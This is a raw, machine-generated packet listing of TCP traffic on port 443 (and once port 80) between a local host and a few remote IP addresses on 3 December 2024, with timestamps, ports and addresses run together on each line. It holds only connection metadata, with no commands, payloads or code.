                                                          Dec 3, 2024 03:27:42.511882067 CET4434977813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:42.513483047 CET49780443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:42.513515949 CET4434978013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:42.513577938 CET49780443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:42.513700962 CET49780443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:42.513712883 CET4434978013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:42.514641047 CET49781443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:42.514674902 CET4434978113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:42.514731884 CET49781443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:42.515221119 CET49782443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:42.515228987 CET4434978213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:42.515278101 CET49782443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:42.515393019 CET49782443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:42.515403986 CET4434978213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:42.515476942 CET49781443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:42.515491009 CET4434978113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:42.865276098 CET44349777149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:27:42.865551949 CET49777443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:27:42.865581036 CET44349777149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:27:42.865875006 CET44349777149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:27:42.866209984 CET49777443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:27:42.866270065 CET44349777149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:27:42.866338015 CET49777443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:27:42.911331892 CET44349777149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:27:43.400131941 CET44349777149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:27:43.400186062 CET44349777149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:27:43.400234938 CET49777443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:27:43.401243925 CET49777443192.168.2.4149.154.167.220
                                                          Dec 3, 2024 03:27:43.401263952 CET44349777149.154.167.220192.168.2.4
                                                          Dec 3, 2024 03:27:44.227886915 CET4434977813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.227888107 CET4434977913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.228611946 CET49779443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.228630066 CET4434977913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.228652954 CET49778443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.228667974 CET4434977813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.229078054 CET49779443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.229084015 CET4434977913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.229147911 CET49778443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.229152918 CET4434977813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.230865955 CET4434978113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.231167078 CET49781443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.231193066 CET4434978113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.231481075 CET49781443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.231486082 CET4434978113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.291223049 CET4434978013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.291563034 CET49780443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.291575909 CET4434978013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.291930914 CET49780443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.291935921 CET4434978013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.294760942 CET4434978213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.294992924 CET49782443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.295006990 CET4434978213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.295331955 CET49782443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.295336008 CET4434978213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.662580967 CET4434977813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.662604094 CET4434977813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.662611961 CET4434977913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.662684917 CET4434977913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.662715912 CET49778443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.662729979 CET4434977813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.662756920 CET49779443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.662786007 CET49778443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.662899017 CET49778443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.662902117 CET4434977813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.662916899 CET49778443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.663063049 CET4434977813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.663090944 CET4434977813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.663139105 CET49778443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.664594889 CET49779443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.664608002 CET4434977913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.664618015 CET49779443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.664623022 CET4434977913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.666181087 CET49784443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.666208982 CET4434978413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.666285038 CET49784443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.667301893 CET49785443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.667350054 CET4434978513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.667406082 CET49785443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.667488098 CET49784443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.667503119 CET4434978413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.667568922 CET49785443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.667584896 CET4434978513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.671454906 CET4434978113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.671514988 CET4434978113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.671583891 CET49781443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.671719074 CET49781443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.671719074 CET49781443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.671736956 CET4434978113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.671745062 CET4434978113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.680154085 CET49786443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.680164099 CET4434978613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.680258036 CET49786443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.680363894 CET49786443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.680376053 CET4434978613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.748498917 CET4434978013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.748517990 CET4434978013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.748671055 CET49780443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.748682022 CET4434978013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.748733044 CET49780443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.748791933 CET49780443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.748795986 CET4434978013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.748807907 CET49780443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.748910904 CET4434978013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.748938084 CET4434978013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.748986959 CET49780443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.750799894 CET49787443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.750816107 CET4434978713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.750874996 CET49787443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.750987053 CET49787443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.750998974 CET4434978713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.758542061 CET4434978213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.758564949 CET4434978213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.758610010 CET49782443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.758619070 CET4434978213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.758775949 CET49782443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.758791924 CET4434978213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.758802891 CET49782443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.758923054 CET4434978213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.758951902 CET4434978213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.759275913 CET49782443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.760699034 CET49788443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.760720968 CET4434978813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:44.760795116 CET49788443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.760926962 CET49788443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:44.760941029 CET4434978813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.452290058 CET4434978513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.452795982 CET49785443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.452821016 CET4434978513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.453288078 CET49785443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.453293085 CET4434978513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.565105915 CET4434978813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.565306902 CET4434978713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.565470934 CET49788443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.565485954 CET4434978813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.565577030 CET49787443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.565593004 CET4434978713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.565869093 CET49788443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.565875053 CET4434978813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.566035986 CET49787443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.566040993 CET4434978713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.581868887 CET4434978613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.582125902 CET49786443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.582151890 CET4434978613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.582397938 CET4434978413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.582469940 CET49786443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.582475901 CET4434978613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.582619905 CET49784443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.582627058 CET4434978413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.582926035 CET49784443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.582930088 CET4434978413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.896351099 CET4434978513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.896414995 CET4434978513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.896461964 CET49785443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.896624088 CET49785443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.896641970 CET4434978513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.896652937 CET49785443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.896657944 CET4434978513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.899337053 CET49789443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.899370909 CET4434978913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:46.899458885 CET49789443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.899627924 CET49789443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:46.899640083 CET4434978913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.018706083 CET4434978813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.018764019 CET4434978813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.018810034 CET49788443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.018918037 CET49788443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.018934965 CET4434978813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.018946886 CET49788443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.018953085 CET4434978813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.021306038 CET49790443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.021323919 CET4434979013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.021392107 CET49790443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.021573067 CET49790443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.021586895 CET4434979013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.025485992 CET4434978713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.025537014 CET4434978713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.025579929 CET49787443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.025700092 CET49787443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.025711060 CET4434978713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.025719881 CET49787443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.025723934 CET4434978713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.028012991 CET49791443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.028033972 CET4434979113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.028124094 CET49791443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.028261900 CET49791443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.028275967 CET4434979113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.038223028 CET4434978413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.038275003 CET4434978413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.038312912 CET49784443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.038351059 CET4434978613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.038397074 CET49784443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.038399935 CET4434978613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.038408041 CET4434978413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.038424015 CET49784443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.038429022 CET4434978413.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.038436890 CET49786443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.038570881 CET49786443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.038575888 CET4434978613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.038604021 CET49786443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.038608074 CET4434978613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.041111946 CET49792443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.041125059 CET4434979213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.041178942 CET49792443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.041222095 CET49793443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.041240931 CET4434979313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.041286945 CET49793443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.041347027 CET49792443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.041358948 CET4434979213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:47.041430950 CET49793443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:47.041441917 CET4434979313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.566605091 CET4434979313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.567116022 CET49793443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:48.567142010 CET4434979313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.567564011 CET49793443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:48.567570925 CET4434979313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.669303894 CET49794443192.168.2.4172.217.21.36
                                                          Dec 3, 2024 03:27:48.669332981 CET44349794172.217.21.36192.168.2.4
                                                          Dec 3, 2024 03:27:48.669415951 CET49794443192.168.2.4172.217.21.36
                                                          Dec 3, 2024 03:27:48.669642925 CET49794443192.168.2.4172.217.21.36
                                                          Dec 3, 2024 03:27:48.669656038 CET44349794172.217.21.36192.168.2.4
                                                          Dec 3, 2024 03:27:48.743175983 CET4434978913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.743740082 CET49789443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:48.743756056 CET4434978913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.744158983 CET49789443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:48.744163990 CET4434978913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.749119997 CET4434979113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.749439001 CET49791443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:48.749448061 CET4434979113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.749829054 CET49791443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:48.749834061 CET4434979113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.865359068 CET4434979013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.865844011 CET49790443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:48.865904093 CET4434979013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.866254091 CET49790443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:48.866266966 CET4434979013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.883909941 CET4434979213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.884202957 CET49792443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:48.884224892 CET4434979213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:48.884531021 CET49792443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:48.884536028 CET4434979213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.005858898 CET4434979313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.005913019 CET4434979313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.005959988 CET49793443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.006103039 CET49793443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.006119013 CET4434979313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.006128073 CET49793443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.006133080 CET4434979313.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.009011984 CET49795443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.009031057 CET4434979513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.009084940 CET49795443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.009282112 CET49795443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.009291887 CET4434979513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.185303926 CET4434979113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.185350895 CET4434979113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.185417891 CET49791443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.185606003 CET49791443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.185626030 CET4434979113.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.188376904 CET49796443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.188395023 CET4434979613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.188483000 CET49796443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.188669920 CET49796443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.188677073 CET4434979613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.197099924 CET4434978913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.197166920 CET4434978913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.197206974 CET49789443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.197288036 CET49789443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.197293997 CET4434978913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.197323084 CET49789443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.197329998 CET4434978913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.199249029 CET49797443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.199270964 CET4434979713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.199331999 CET49797443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.199484110 CET49797443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.199493885 CET4434979713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.318270922 CET4434979013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.318324089 CET4434979013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.318375111 CET49790443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.318495989 CET49790443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.318504095 CET4434979013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.318514109 CET49790443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.318519115 CET4434979013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.320502043 CET49798443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.320513010 CET4434979813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.320600986 CET49798443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.320759058 CET49798443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.320771933 CET4434979813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.336980104 CET4434979213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.337038994 CET4434979213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.337093115 CET49792443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.337228060 CET49792443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.337238073 CET4434979213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.337270975 CET49792443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.337275982 CET4434979213.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.339092970 CET49799443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.339107990 CET4434979913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:49.339173079 CET49799443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.339282036 CET49799443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:49.339292049 CET4434979913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:50.454427004 CET44349794172.217.21.36192.168.2.4
                                                          Dec 3, 2024 03:27:50.454907894 CET49794443192.168.2.4172.217.21.36
                                                          Dec 3, 2024 03:27:50.454924107 CET44349794172.217.21.36192.168.2.4
                                                          Dec 3, 2024 03:27:50.455209970 CET44349794172.217.21.36192.168.2.4
                                                          Dec 3, 2024 03:27:50.455559015 CET49794443192.168.2.4172.217.21.36
                                                          Dec 3, 2024 03:27:50.455610991 CET44349794172.217.21.36192.168.2.4
                                                          Dec 3, 2024 03:27:50.496762037 CET49794443192.168.2.4172.217.21.36
                                                          Dec 3, 2024 03:27:50.723598003 CET4434979513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:50.724029064 CET49795443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:50.724057913 CET4434979513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:50.724474907 CET49795443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:50.724479914 CET4434979513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:50.966571093 CET4434979613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:50.967685938 CET49796443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:50.967700005 CET4434979613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:50.968127012 CET49796443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:50.968131065 CET4434979613.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:50.978315115 CET4434979713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:50.994841099 CET49797443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:50.994872093 CET4434979713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:50.995820045 CET49797443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:50.995826006 CET4434979713.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:51.032290936 CET4972480192.168.2.493.184.221.240
                                                          Dec 3, 2024 03:27:51.147078991 CET4434979813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:51.152446985 CET804972493.184.221.240192.168.2.4
                                                          Dec 3, 2024 03:27:51.152499914 CET4972480192.168.2.493.184.221.240
                                                          Dec 3, 2024 03:27:51.160979986 CET4434979513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:51.161041975 CET4434979513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:51.161088943 CET49795443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:51.162484884 CET49798443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:51.162503958 CET4434979813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:51.166079998 CET49798443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:51.166085958 CET4434979813.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:51.185028076 CET49795443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:51.185056925 CET4434979513.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:51.186736107 CET4434979913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:51.220834017 CET49799443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:51.220851898 CET4434979913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:51.225919008 CET49799443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:51.225924015 CET4434979913.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:51.233081102 CET49800443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:51.233103037 CET4434980013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:51.233175039 CET49800443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:51.236170053 CET49800443192.168.2.413.107.246.63
                                                          Dec 3, 2024 03:27:51.236183882 CET4434980013.107.246.63192.168.2.4
                                                          Dec 3, 2024 03:27:51.410593987 CET4434979613.107.246.63192.168.2.4
